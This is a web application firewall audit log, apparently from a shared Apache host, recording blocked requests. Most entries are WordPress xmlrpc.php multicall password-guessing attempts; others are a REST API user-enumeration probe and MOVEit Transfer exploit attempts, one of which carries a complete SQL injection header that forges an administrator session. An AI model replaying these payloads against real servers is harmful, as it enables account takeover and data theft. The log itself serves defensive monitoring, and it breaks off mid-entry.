[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749125997242858 7599 (- - -) Stopwatch2: 1749125997242858 7599; combined=4733, p1=652, p2=3901, p3=0, p4=0, p5=107, sr=113, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f61175d-Z-- --d3de4b3c-A-- [05/Jun/2025:19:20:01 +0700] aEGLcVwdJdhOudw5hdz_-QAAAIQ 103.236.140.4 32972 103.236.140.4 8181 --d3de4b3c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.81.182.244 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.81.182.244 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d3de4b3c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehAdmin@123321 --d3de4b3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3de4b3c-E-- --d3de4b3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.81.182.244 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749126001444401 6397 (- - -) Stopwatch2: 1749126001444401 6397; combined=4444, p1=542, p2=3731, p3=0, p4=0, p5=102, sr=92, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3de4b3c-Z-- --0d41442e-A-- [05/Jun/2025:19:20:52 +0700] aEGLpFwdJdhOudw5hdz_-gAAAJY 103.236.140.4 32980 103.236.140.4 8181 --0d41442e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.161 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.161 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0d41442e-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehDeveloper@321 --0d41442e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d41442e-E-- --0d41442e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.161 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749126052618330 5380 (- - -) Stopwatch2: 1749126052618330 5380; combined=3819, p1=436, p2=3206, p3=0, p4=0, p5=107, sr=74, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d41442e-Z-- --f0771d7f-A-- [05/Jun/2025:19:25:08 +0700] aEGMpFwdJdhOudw5hdwACgAAAIA 103.236.140.4 33040 103.236.140.4 8181 --f0771d7f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 192.169.190.104 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 192.169.190.104 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f0771d7f-C-- system.multicallmethodNamewp.getUsersBlogsparamsmarinMarin2016! --f0771d7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0771d7f-E-- --f0771d7f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 192.169.190.104 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749126308884312 4764 (- - -) Stopwatch2: 1749126308884312 4764; combined=3634, p1=389, p2=3083, p3=0, p4=0, p5=95, sr=78, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0771d7f-Z-- --44051974-A-- [05/Jun/2025:19:27:44 +0700] aEGNQOth7G2xELALzPZfAgAAAMQ 103.236.140.4 33110 103.236.140.4 8181 --44051974-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 498 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --44051974-C-- system.multicallmethodNamewp.getUsersBlogsparamsbeheertweekshopbeheerantixshop --44051974-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44051974-E-- --44051974-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749126464094858 7508 (- - -) Stopwatch2: 1749126464094858 7508; combined=4738, p1=650, p2=3889, p3=0, p4=0, p5=124, sr=119, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44051974-Z-- --39a6a838-A-- [05/Jun/2025:19:28:22 +0700] aEGNZuth7G2xELALzPZfBAAAAMg 103.236.140.4 33132 103.236.140.4 8181 --39a6a838-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.161 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.161 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --39a6a838-C-- system.multicallmethodNamewp.getUsersBlogsparamssoleh22soleh22 --39a6a838-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39a6a838-E-- --39a6a838-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.161 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749126502239734 6619 (- - -) Stopwatch2: 1749126502239734 6619; combined=4532, p1=588, p2=3753, p3=0, p4=0, p5=112, sr=97, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39a6a838-Z-- --f4ae786b-A-- [05/Jun/2025:19:31:22 +0700] aEGOGuth7G2xELALzPZfCAAAAMY 103.236.140.4 33160 103.236.140.4 8181 --f4ae786b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f4ae786b-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix@2024! --f4ae786b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4ae786b-E-- --f4ae786b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749126682799372 5766 (- - -) Stopwatch2: 1749126682799372 5766; combined=4178, p1=472, p2=3534, p3=0, p4=0, p5=101, sr=91, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4ae786b-Z-- --88e0d014-A-- [05/Jun/2025:19:31:51 +0700] aEGON1wdJdhOudw5hdwAIQAAAIs 103.236.140.4 33168 103.236.140.4 8181 --88e0d014-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.161 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.161 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --88e0d014-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin@24 --88e0d014-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88e0d014-E-- --88e0d014-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.161 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749126711852252 5689 (- - -) Stopwatch2: 1749126711852252 5689; combined=4125, p1=470, p2=3483, p3=0, p4=0, p5=101, sr=89, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88e0d014-Z-- --fbcc994e-A-- [05/Jun/2025:19:35:31 +0700] aEGPE1wdJdhOudw5hdwALQAAAJQ 103.236.140.4 33280 103.236.140.4 8181 --fbcc994e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.81.182.244 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.81.182.244 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fbcc994e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin.. --fbcc994e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbcc994e-E-- --fbcc994e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.81.182.244 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749126931316036 4846 (- - -) Stopwatch2: 1749126931316036 4846; combined=3780, p1=407, p2=3215, p3=0, p4=0, p5=93, sr=82, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbcc994e-Z-- --7a15ef3f-A-- [05/Jun/2025:19:37:49 +0700] aEGPneth7G2xELALzPZfKwAAAMQ 103.236.140.4 33316 103.236.140.4 8181 --7a15ef3f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7a15ef3f-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminRahul@123 --7a15ef3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a15ef3f-E-- --7a15ef3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749127069186956 5264 (- - -) Stopwatch2: 1749127069186956 5264; combined=3894, p1=482, p2=3239, p3=0, p4=0, p5=101, sr=125, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a15ef3f-Z-- --5a482753-A-- [05/Jun/2025:19:42:31 +0700] aEGQtyrHpfaS2Cuwh8UL3AAAAE8 103.236.140.4 33388 103.236.140.4 8181 --5a482753-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5a482753-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminqwer1234 --5a482753-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a482753-E-- --5a482753-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749127351900607 5516 (- - -) Stopwatch2: 1749127351900607 5516; combined=4011, p1=464, p2=3383, p3=0, p4=0, p5=97, sr=82, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a482753-Z-- --61a64f7c-A-- [05/Jun/2025:19:55:50 +0700] aEGT1uth7G2xELALzPZfUwAAAMg 103.236.140.4 33482 103.236.140.4 8181 --61a64f7c-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173975562 --61a64f7c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --61a64f7c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749128150051275 1846 (- - -) Stopwatch2: 1749128150051275 1846; combined=725, p1=349, p2=348, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61a64f7c-Z-- --a614c752-A-- [05/Jun/2025:20:00:22 +0700] aEGU5lwdJdhOudw5hdwAVAAAAIk 103.236.140.4 33560 103.236.140.4 8181 --a614c752-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: siLockLongTermInstID=0; SenayanMember=hs0u2nqv0endo5qrqk5foqgo2t X-Varnish: 173975576 --a614c752-C-- --a614c752-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a614c752-E-- --a614c752-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749128422051866 3206 (- - -) Stopwatch2: 1749128422051866 3206; combined=1624, p1=502, p2=1096, p3=0, p4=0, p5=26, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a614c752-Z-- --83f1c159-A-- [05/Jun/2025:20:00:27 +0700] aEGU61wdJdhOudw5hdwAVgAAAI4 103.236.140.4 33570 103.236.140.4 8181 --83f1c159-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xxRNEzNwXI0bzeiwv5DSRNFYJz');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET IpAddress='206.82.6.62' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE 
SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=hs0u2nqv0endo5qrqk5foqgo2t X-Varnish: 173975579 --83f1c159-C-- --83f1c159-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83f1c159-E-- --83f1c159-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749128427032897 2886 (- - -) Stopwatch2: 1749128427032897 2886; combined=1453, p1=424, p2=1000, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83f1c159-Z-- --632b4d0a-A-- [05/Jun/2025:20:14:17 +0700] aEGYKeth7G2xELALzPZffQAAAMM 103.236.140.4 33814 103.236.140.4 8181 --632b4d0a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.59.17.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.59.17.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --632b4d0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --632b4d0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749129257782227 2849 (- - -) Stopwatch2: 1749129257782227 2849; combined=1300, p1=436, p2=834, p3=0, p4=0, p5=30, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --632b4d0a-Z-- --c56cb559-A-- [05/Jun/2025:20:29:26 +0700] aEGbtuth7G2xELALzPZfuAAAAMQ 103.236.140.4 34108 103.236.140.4 8181 --c56cb559-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.69.98.51 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.69.98.51 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c56cb559-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehAjdoo2010! --c56cb559-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c56cb559-E-- --c56cb559-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: 